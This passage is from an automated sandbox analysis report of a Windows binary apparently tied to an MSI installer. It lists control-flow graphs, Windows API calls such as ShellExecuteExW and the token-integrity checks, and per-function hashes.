4c5529 33844->33875 33845 4c55f7 ShellExecuteExW 33846 4c5609 33845->33846 33848 4c5612 33845->33848 33930 4c5890 6 API calls 33846->33930 33849 4c5646 33848->33849 33851 4c5625 ShellExecuteExW 33848->33851 33858 4c566c GetModuleHandleW GetProcAddress 33849->33858 33859 4c56fd 33849->33859 33850 4c5493 GetWindowsDirectoryW 33928 4c5b10 70 API calls 33850->33928 33851->33849 33853 4c563d 33851->33853 33931 4c5890 6 API calls 33853->33931 33854 4c54b4 33929 4c5b10 70 API calls 33854->33929 33855->33850 33860 4c54cc 33855->33860 33864 4c568a AllowSetForegroundWindow 33858->33864 33861 4c5721 33859->33861 33862 4c570e WaitForSingleObject GetExitCodeProcess 33859->33862 33860->33844 33860->33875 33924 4c5940 33861->33924 33862->33861 33864->33859 33865 4c5698 33864->33865 33865->33859 33866 4c56a1 GetModuleHandleW GetProcAddress 33865->33866 33867 4c56fa 33866->33867 33868 4c56b4 33866->33868 33867->33859 33872 4c56ed 33868->33872 33873 4c56c8 Sleep EnumWindows 33868->33873 33870 4e2937 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33871 4c57a8 33870->33871 33871->33678 33872->33867 33874 4c56f3 BringWindowToTop 33872->33874 33873->33868 33873->33872 34001 4c5830 GetWindowThreadProcessId GetWindowLongW 33873->34001 33874->33867 33875->33845 33878 4c5ebe GetLastError 33877->33878 33879 4c5e18 33877->33879 33878->33879 33881 4c5ec9 33878->33881 33879->33618 33879->33619 33880 4c5f0e GetTokenInformation 33880->33879 33881->33880 33882 4c5ee9 33881->33882 33883 4c5ed9 codecvt 33881->33883 33886 4c60d0 45 API calls 3 library calls 33882->33886 33883->33880 33885 4c5ef2 33885->33880 33886->33885 33892->33749 33893->33754 33894->33745 33895->33752 33896->33757 33897->33748 33898->33766 33899->33766 33900->33766 33901->33771 33902->33773 33904->33813 33905->33813 33906->33813 33910 4c5d6e 33909->33910 33912 4c5d7d 33910->33912 33933 4c4a10 41 API calls 4 library calls 33910->33933 33912->33832 33914 4c59f8 33913->33914 33915 4c5a03 33913->33915 33916 4c5d30 41 API calls 33914->33916 33918 4c2310 56 API calls 33915->33918 33919 4c5a1a 33915->33919 33917 4c5a01 33916->33917 33917->33838 33918->33919 33934 4c5a60 42 API calls 33919->33934 33935 4e7869 33921->33935 33925 4c572d 33924->33925 33926 4c5971 33924->33926 33925->33870 33926->33925 33927 4c5981 CloseHandle 33926->33927 33927->33925 33928->33854 33929->33860 33930->33848 33931->33849 33933->33912 33934->33917 33940 4e7078 33935->33940 33941 4e708f 33940->33941 33942 4e7096 33940->33942 33948 4e76d9 33941->33948 33942->33941 33985 4f57cc 41 API calls 3 library calls 33942->33985 33944 4e70b7 33986 4f5ab7 41 API calls __Getctype 33944->33986 33946 4e70cd 33987 4f5b15 41 API calls std::_Locinfo::_W_Getmonths 33946->33987 33949 4e7709 ___crtCompareStringW 33948->33949 33950 4e76f3 33948->33950 33949->33950 33953 4e7720 33949->33953 33988 4e7370 14 API calls std::_Stodx_v2 33950->33988 33952 4e76f8 33989 4e7017 41 API calls collate 33952->33989 33960 4e7702 33953->33960 33990 4f5c2a 6 API calls 2 library calls 33953->33990 33956 4e776e 33957 4e778f 33956->33957 33958 4e7778 33956->33958 33962 4e7794 33957->33962 33963 4e77a5 33957->33963 33991 4e7370 14 API calls std::_Stodx_v2 33958->33991 33959 4e2937 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33964 4c53d3 33959->33964 33960->33959 33993 4e7370 14 API calls std::_Stodx_v2 33962->33993 33967 4e7826 33963->33967 33969 4e77cc 33963->33969 33970 4e77b9 __alloca_probe_16 33963->33970 33964->33836 33964->33842 33965 4e777d 33992 4e7370 14 API calls std::_Stodx_v2 33965->33992 33998 4e7370 14 API calls std::_Stodx_v2 33967->33998 33994 4f5bdc 15 API calls 2 library calls 33969->33994 33970->33967 33978 4e77e6 33970->33978 33973 4e782b 33999 4e7370 14 API calls std::_Stodx_v2 33973->33999 33975 4e7813 34000 4e2326 14 API calls ~collate 33975->34000 33976 4e77d2 33976->33967 33976->33970 33995 4f5c2a 6 API calls 2 library calls 33978->33995 33980 4e7802 33981 4e781a 33980->33981 33982 4e7809 33980->33982 33997 4e7370 14 API calls std::_Stodx_v2 33981->33997 33996 4eb762 41 API calls 2 library calls 33982->33996 33985->33944 33986->33946 33987->33941 33988->33952 33989->33960 33990->33956 33991->33965 33992->33960 33993->33952 33994->33976 33995->33980 33996->33975 33997->33975 33998->33973 33999->33975 34000->33960

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 004C4BA0 Relevance: 36.5, APIs: 24, Instructions: 502comCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 0 4c4ba0-4c4bf1 call 4c57c0 3 4c4c15-4c4c4d CoInitialize CoCreateInstance 0->3 4 4c4bf3-4c4c10 call 4c52f0 0->4 6 4c4c4f-4c4c53 3->6 7 4c4c58-4c4ca6 VariantInit 3->7 12 4c5190-4c51aa call 4e2937 4->12 9 4c5169-4c5172 6->9 17 4c4ca8-4c4cac 7->17 18 4c4cb1-4c4cd5 IUnknown_QueryService 7->18 10 4c517a-4c5185 9->10 11 4c5174-4c5176 9->11 14 4c518d 10->14 15 4c5187 CoUninitialize 10->15 11->10 14->12 15->14 20 4c514b-4c5154 17->20 21 4c4cd7-4c4cdb 18->21 22 4c4ce0-4c4cfa 18->22 24 4c515c-4c5167 VariantClear 20->24 25 4c5156-4c5158 20->25 23 4c513a-4c5143 21->23 28 4c4cfc-4c4d00 22->28 29 4c4d05-4c4d26 22->29 23->20 26 4c5145-4c5147 23->26 24->9 25->24 26->20 30 4c5129-4c5132 28->30 33 4c4d28-4c4d2c 29->33 34 4c4d31-4c4d4f IUnknown_QueryInterface_Proxy 29->34 30->23 32 4c5134-4c5136 30->32 32->23 35 4c5118-4c5121 33->35 36 4c4d5a-4c4d74 34->36 37 4c4d51-4c4d55 34->37 35->30 38 4c5123-4c5125 35->38 42 4c4d7f-4c4d9d IUnknown_QueryInterface_Proxy 36->42 43 4c4d76-4c4d7a 36->43 39 4c5107-4c5110 37->39 38->30 39->35 40 4c5112-4c5114 39->40 40->35 45 4c4d9f-4c4da3 42->45 46 4c4da8-4c4dc0 CoAllowSetForegroundWindow 42->46 44 4c50f6-4c50ff 43->44 44->39 50 4c5101-4c5103 44->50 47 4c50e5-4c50ee 45->47 48 4c4e28-4c4e35 SysAllocString 46->48 49 4c4dc2-4c4dc4 46->49 47->44 53 4c50f0-4c50f2 47->53 51 4c51ba-4c5201 call 4c11d0 48->51 52 4c4e3b 48->52 54 4c4dca-4c4ded SysAllocString 49->54 50->39 63 4c5209-4c5217 51->63 64 4c5203-4c5205 51->64 52->54 53->44 55 4c4def-4c4df2 54->55 56 4c4df8-4c4e1b SysAllocString 54->56 55->56 58 4c51b0-4c51b5 call 4ccf40 55->58 59 4c4e3d-4c4ebf VariantInit 56->59 60 4c4e1d-4c4e20 56->60 58->51 67 4c4eca-4c4ece 59->67 68 4c4ec1-4c4ec5 59->68 60->58 62 4c4e26 60->62 62->59 64->63 70 4c509c 67->70 71 4c4ed4 67->71 69 4c50a0-4c50df VariantClear * 4 SysFreeString 68->69 69->47 70->69 72 4c4ed6-4c4f0c 71->72 73 4c4f10-4c4f19 72->73 73->73 74 4c4f1b-4c4fa2 call 4c24c0 call 4c12f0 call 4c3860 call 4c2e60 * 2 73->74 85 4c4faa 74->85 86 4c4fa4-4c4fa8 74->86 87 4c4fb1-4c4fb3 85->87 86->87 88 4c4fb9-4c4fc3 87->88 89 4c5036-4c5046 87->89 92 4c4fd5-4c5009 OpenProcess WaitForSingleObject 88->92 93 4c4fc5-4c4fd3 call 4c4270 88->93 90 4c508d-4c5096 89->90 91 4c5048-4c5057 89->91 90->70 90->72 94 4c5059-4c5064 91->94 95 4c506a-4c506c 91->95 97 4c500b-4c500d GetExitCodeProcess 92->97 98 4c5013-4c5023 92->98 93->92 94->95 100 4c51ab call 4e7027 94->100 101 4c506e-4c506f LocalFree 95->101 102 4c5075-4c5086 95->102 97->98 98->89 99 4c5025-4c502c CloseHandle 98->99 99->89 100->58 101->102 102->90
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004C57C0: GetCurrentProcess.KERNEL32(00000008,?,C7C71CC4,?,-00000010), ref: 004C57D0
                                                                                                                                                              • Part of subcall function 004C57C0: OpenProcessToken.ADVAPI32(00000000), ref: 004C57D7
                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 004C4C15
                                                                                                                                                            • CoCreateInstance.OLE32(005072B0,00000000,00000004,00515104,00000000,?), ref: 004C4C45
                                                                                                                                                            • CoUninitialize.COMBASE ref: 004C5187
                                                                                                                                                            • _com_issue_error.COMSUPP ref: 004C51B5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 928366108-0
                                                                                                                                                            • Opcode ID: 1dfd48a3de34507e46d9cb02fb52c7007f49100aa4bbcff3663efa91d9b44316
                                                                                                                                                            • Instruction ID: 69d1f2e81ee80397f68c1bb8c0a763f9b6412bcbe1cb8f0a2e93a8f4d3e63c87
                                                                                                                                                            • Opcode Fuzzy Hash: 1dfd48a3de34507e46d9cb02fb52c7007f49100aa4bbcff3663efa91d9b44316
                                                                                                                                                            • Instruction Fuzzy Hash: 6422A074E04388DFEB11CFA8C948B9EBBB4AF55304F14819EE405EB381DB79AA45CB51
                                                                                                                                                            Function 004C6A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 105 4c6a50-4c6a82 106 4c6a84-4c6aa2 call 4e2937 105->106 107 4c6aa3-4c6add GetCurrentProcess OpenProcessToken 105->107 111 4c6adf-4c6af2 107->111 112 4c6b09-4c6b1e call 4c5de0 107->112 113 4c6af4-4c6afb CloseHandle 111->113 114 4c6b02-4c6b04 111->114 119 4c6b2e-4c6b30 112->119 120 4c6b20-4c6b2c call 4c1770 112->120 113->114 116 4c6c24-4c6c2b call 4c57c0 114->116 126 4c6ddb-4c6e06 call 4c2310 116->126 127 4c6c31-4c6c35 116->127 123 4c6b3f-4c6ba5 call 4c5f40 call 4c24c0 119->123 124 4c6b32-4c6b3d call 4c1770 119->124 120->111 141 4c6bdb 123->141 142 4c6ba7-4c6ba9 123->142 124->111 137 4c6e0c-4c6e2b call 4c46f0 126->137 138 4c6f96-4c6fa0 call 4c11d0 126->138 127->126 132 4c6c3b-4c6c3d 127->132 132->126 136 4c6c43-4c6c59 call 4c2310 132->136 136->138 149 4c6c5f-4c6c7e call 4c46f0 136->149 158 4c6e2d-4c6e2f 137->158 159 4c6e59-4c6e6a call 4c2310 137->159 148 4c6bdd-4c6c14 call 4c2e60 * 2 call 4c1770 141->148 146 4c6baf-4c6bb8 142->146 147 4c6c88-4c6c8a 142->147 146->141 152 4c6bba-4c6bbc 146->152 147->148 148->116 182 4c6c16-4c6c1d CloseHandle 148->182 171 4c6cad-4c6cc9 call 4c2310 149->171 172 4c6c80-4c6c82 149->172 155 4c6bbf 152->155 155->141 160 4c6bc1-4c6bc4 155->160 163 4c6e35-4c6e3a 158->163 164 4c6e31-4c6e33 158->164 159->138 175 4c6e70-4c6e8c call 4c46f0 159->175 160->147 165 4c6bca-4c6bd9 160->165 174 4c6e40-4c6e49 163->174 173 4c6e4f-4c6e54 call 4c4ac0 164->173 165->141 165->155 171->138 189 4c6ccf-4c6ceb call 4c46f0 171->189 177 4c6c8f-4c6c91 172->177 178 4c6c84-4c6c86 172->178 173->159 174->174 180 4c6e4b-4c6e4d 174->180 193 4c6e8e-4c6e90 175->193 194 4c6eb9-4c6ec6 call 4c2310 175->194 184 4c6c94-4c6c9d 177->184 183 4c6ca3-4c6ca8 call 4c4ac0 178->183 180->173 182->116 183->171 184->184 187 4c6c9f-4c6ca1 184->187 187->183 200 4c6ced-4c6cef 189->200 201 4c6d19-4c6d26 call 4c2310 189->201 196 4c6e96-4c6e9b 193->196 197 4c6e92-4c6e94 193->197 194->138 205 4c6ecc-4c6ee8 call 4c46f0 194->205 203 4c6ea0-4c6ea9 196->203 202 4c6eaf-4c6eb4 call 4c4ac0 197->202 206 4c6cf5-4c6cfa 200->206 207 4c6cf1-4c6cf3 200->207 201->138 217 4c6d2c-4c6d48 call 4c46f0 201->217 202->194 203->203 209 4c6eab-4c6ead 203->209 221 4c6eea-4c6eec 205->221 222 4c6f10-4c6f47 call 4c52f0 205->222 212 4c6d00-4c6d09 206->212 211 4c6d0f-4c6d14 call 4c4ac0 207->211 209->202 211->201 212->212 215 4c6d0b-4c6d0d 212->215 215->211 231 4c6d4a-4c6d4c 217->231 232 4c6d70-4c6d85 call 4c4ba0 217->232 224 4c6eee-4c6ef0 221->224 225 4c6ef2-4c6ef4 221->225 238 4c6f49-4c6f4c 222->238 239 4c6f51-4c6f65 222->239 228 4c6f06-4c6f0b call 4c4ac0 224->228 229 4c6ef7-4c6f00 225->229 228->222 229->229 236 4c6f02-4c6f04 229->236 233 4c6d4e-4c6d50 231->233 234 4c6d52-4c6d54 231->234 244 4c6d8a-4c6da4 232->244 240 4c6d66-4c6d6b call 4c4ac0 233->240 241 4c6d57-4c6d60 234->241 236->228 238->239 242 4c6f6f-4c6f76 239->242 243 4c6f67-4c6f6a 239->243 240->232 241->241 245 4c6d62-4c6d64 241->245 247 4c6f79-4c6f84 242->247 243->242 248 4c6dae-4c6dc2 244->248 249 4c6da6-4c6da9 244->249 245->240 250 4c6f8e 247->250 251 4c6f86-4c6f89 247->251 252 4c6dcc-4c6dd6 248->252 253 4c6dc4-4c6dc7 248->253 249->248 250->138 251->250 252->247 253->252
                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 004C6AC8
                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 004C6AD5
                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004C6AF5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$CloseCurrentHandleOpenToken
                                                                                                                                                            • String ID: S-1-5-18
                                                                                                                                                            • API String ID: 4052875653-4289277601
                                                                                                                                                            • Opcode ID: d726a5d2ec9f04e1ae33c4eee48f3340eafff6755cbd0813215f239fb7ae5079
                                                                                                                                                            • Instruction ID: 215e4d5be17be4e24cd14c89395f0432ae1e725584b6b16aadf632889f43c2d8
                                                                                                                                                            • Opcode Fuzzy Hash: d726a5d2ec9f04e1ae33c4eee48f3340eafff6755cbd0813215f239fb7ae5079
                                                                                                                                                            • Instruction Fuzzy Hash: 0002D278900249CFDF44DFA4C954BAEBBB5EF45304F15825ED802AB285EB78AE05CB94
                                                                                                                                                            Function 004C57C0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 254 4c57c0-4c57df GetCurrentProcess OpenProcessToken 255 4c57e7-4c5814 GetTokenInformation 254->255 256 4c57e1-4c57e6 254->256 257 4c581e-4c582e CloseHandle 255->257 258 4c5816-4c581b 255->258 258->257
                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,C7C71CC4,?,-00000010), ref: 004C57D0
                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004C57D7
                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 004C580C
                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004C5822
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 215268677-0
                                                                                                                                                            • Opcode ID: ec02faacfa802f9b9a4dc7f01854a7d7ad1e5721ea67e527792a22fb8d052a84
                                                                                                                                                            • Instruction ID: 15cc83243abd773a65f9f9cecdd002f684613fc04d890954327cf53dae0abe07
                                                                                                                                                            • Opcode Fuzzy Hash: ec02faacfa802f9b9a4dc7f01854a7d7ad1e5721ea67e527792a22fb8d052a84
                                                                                                                                                            • Instruction Fuzzy Hash: A5F01274548305AFE7109F10EC49B9F7BE8BB54700F548919F994C2260D379A55CEF63
                                                                                                                                                            Function 004CCDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • GetCommandLineW.KERNEL32(C7C71CC4,?,?,?,?,?,?,?,?,?,005056D5,000000FF), ref: 004CCDE8
                                                                                                                                                              • Part of subcall function 004C1F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,004C4251,C7C71CC4,00000000,?,00000000,?,?,?,00504400,000000FF,?), ref: 004C1F9D
                                                                                                                                                            • ExitProcess.KERNEL32 ref: 004CCEB1
                                                                                                                                                              • Part of subcall function 004C6600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 004C667E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                                                                                                            • String ID: Full command line:
                                                                                                                                                            • API String ID: 1878577176-831861440
                                                                                                                                                            • Opcode ID: fd22b24d1b665088b273b928deeea5f57419f438ce5eae6e4560056f4261ad3e
                                                                                                                                                            • Instruction ID: 147cc8555969d9499031db26b6c6b49b6483ac6952df318884bb4665e9af8242
                                                                                                                                                            • Opcode Fuzzy Hash: fd22b24d1b665088b273b928deeea5f57419f438ce5eae6e4560056f4261ad3e
                                                                                                                                                            • Instruction Fuzzy Hash: D2213538A10114ABCB44FB61CC55FEF77A1AF45748F11812EF40697292EF386B09C799
                                                                                                                                                            Function 004C5E40 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 291 4c5e40-4c5ebc GetTokenInformation 292 4c5ebe-4c5ec7 GetLastError 291->292 293 4c5f20-4c5f33 291->293 292->293 294 4c5ec9-4c5ed7 292->294 295 4c5ede 294->295 296 4c5ed9-4c5edc 294->296 298 4c5f0e-4c5f1a GetTokenInformation 295->298 299 4c5ee0-4c5ee7 295->299 297 4c5f0b 296->297 297->298 298->293 300 4c5ee9-4c5ef5 call 4c60d0 299->300 301 4c5ef7-4c5f08 call 4e4080 299->301 300->298 301->297
                                                                                                                                                            APIs
                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,004C5E18,C7C71CC4,?), ref: 004C5EB4
                                                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,004C5E18,C7C71CC4,?), ref: 004C5EBE
                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,004C5E18,C7C71CC4,?), ref: 004C5F1A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InformationToken$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2567405617-0
                                                                                                                                                            • Opcode ID: 04e7ed9e04d5f9af3a4f8284ca2666e2b29eb1b7203c1e9884435171d2b120c3
                                                                                                                                                            • Instruction ID: d2f8da5882e4a293e159ea3b4b85a43e878addf83c11dde4baa6436ff9677161
                                                                                                                                                            • Opcode Fuzzy Hash: 04e7ed9e04d5f9af3a4f8284ca2666e2b29eb1b7203c1e9884435171d2b120c3
                                                                                                                                                            • Instruction Fuzzy Hash: FA318F71A006099FD714CF99CC45BAFBBF9FB48710F10452EE515A7280D7B579448BA4
                                                                                                                                                            Function 004F70BB Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 306 4f70bb-4f70c6 307 4f70c8-4f70d2 306->307 308 4f70d4-4f70da 306->308 307->308 309 4f7108-4f7113 call 4e7370 307->309 310 4f70dc-4f70dd 308->310 311 4f70f3-4f7104 RtlAllocateHeap 308->311 315 4f7115-4f7117 309->315 310->311 312 4f70df-4f70e6 call 4f5245 311->312 313 4f7106 311->313 312->309 319 4f70e8-4f70f1 call 4fbf83 312->319 313->315 319->309 319->311
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,004F596A,00000001,00000364,?,00000006,000000FF,?,004E6CE7,00000000,A8O,00000000), ref: 004F70FC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 0863d09000eb1412b96b6c50ce78fe3303bb4159753321bcc50259565a539b48
                                                                                                                                                            • Instruction ID: 2bb31a55222769ca38d3bf377eeb042db3c4b8cc7216e124b6187575b3b76068
                                                                                                                                                            • Opcode Fuzzy Hash: 0863d09000eb1412b96b6c50ce78fe3303bb4159753321bcc50259565a539b48
                                                                                                                                                            • Instruction Fuzzy Hash: E9F0B43160C22C6ADB225B229D05B7B774DEF517B1B158117FF149A390CE2CEC0586E9

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 004C52F0 Relevance: 54.7, APIs: 14, Strings: 17, Instructions: 402libraryloadersleepCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 477 4c52f0-4c53a8 call 4c63a0 call 4c5d30 * 2 call 4c59c0 486 4c53ae-4c53bd 477->486 487 4c57b0-4c57ba call 4c11d0 477->487 488 4c53bf-4c53c7 call 4c49a0 486->488 489 4c53c9-4c53db call 4e7852 486->489 488->489 489->487 496 4c53e1-4c540a call 4c5d30 489->496 499 4c540c-4c540f 496->499 500 4c5414-4c5419 496->500 499->500 501 4c54cf-4c551b 500->501 502 4c541f-4c5429 500->502 504 4c551d-4c5526 GetForegroundWindow 501->504 505 4c5529-4c552b 501->505 503 4c5430-4c5436 502->503 506 4c5438-4c543b 503->506 507 4c5456-4c5458 503->507 504->505 508 4c55f7-4c5607 ShellExecuteExW 505->508 509 4c5531-4c5535 505->509 512 4c543d-4c5445 506->512 513 4c5452-4c5454 506->513 514 4c545b-4c545d 507->514 510 4c5609-4c5612 call 4c5890 508->510 511 4c5614-4c5616 508->511 515 4c5537-4c553e 509->515 516 4c5540-4c554c 509->516 510->511 519 4c5618-4c561e 511->519 520 4c5646-4c5666 call 4c5b30 511->520 512->507 521 4c5447-4c5450 512->521 513->514 522 4c545f 514->522 523 4c5493-4c54cc GetWindowsDirectoryW call 4c5b10 * 2 514->523 515->515 515->516 518 4c5550-4c555d 516->518 518->518 525 4c555f-4c556b 518->525 526 4c5625-4c563b ShellExecuteExW 519->526 527 4c5620-4c5623 519->527 543 4c566c-4c5696 GetModuleHandleW GetProcAddress AllowSetForegroundWindow 520->543 544 4c56fd-4c5702 520->544 521->503 521->513 530 4c5464-4c546a 522->530 523->501 533 4c5570-4c557d 525->533 526->520 534 4c563d-4c5641 call 4c5890 526->534 527->520 527->526 531 4c546c-4c546f 530->531 532 4c548a-4c548c 530->532 537 4c5486-4c5488 531->537 538 4c5471-4c5479 531->538 540 4c548f-4c5491 532->540 533->533 539 4c557f-4c55f5 call 4c64a0 * 5 533->539 534->520 537->540 538->532 545 4c547b-4c5484 538->545 539->508 540->501 540->523 543->544 556 4c5698-4c569f 543->556 548 4c5704-4c570c 544->548 549 4c5721-4c5744 call 4c5940 544->549 545->530 545->537 548->549 551 4c570e-4c571b WaitForSingleObject GetExitCodeProcess 548->551 557 4c574e-4c5762 549->557 558 4c5746-4c5749 549->558 551->549 556->544 559 4c56a1-4c56b2 GetModuleHandleW GetProcAddress 556->559 563 4c576c-4c5781 557->563 564 4c5764-4c5767 557->564 558->557 561 4c56fa 559->561 562 4c56b4-4c56c1 559->562 561->544 572 4c56c3-4c56c6 562->572 566 4c578b-4c57af call 4e2937 563->566 567 4c5783-4c5786 563->567 564->563 567->566 575 4c56ef-4c56f1 572->575 576 4c56c8-4c56eb Sleep EnumWindows 572->576 